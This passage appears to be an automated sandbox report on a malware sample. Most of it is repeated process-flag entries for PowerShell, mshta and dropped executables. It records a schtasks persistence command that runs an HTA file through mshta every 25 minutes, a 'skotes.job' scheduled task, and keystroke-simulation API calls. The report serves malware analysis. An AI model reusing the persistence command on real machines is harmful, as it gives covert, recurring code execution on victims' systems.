                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0097F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0097F98E
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009F1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009F1C41
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value created or modified: unknown 1A717C40FF7F60C18953B46A69A8FC47CCE7DAD6116CD3715DEB2ABF0D80722D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
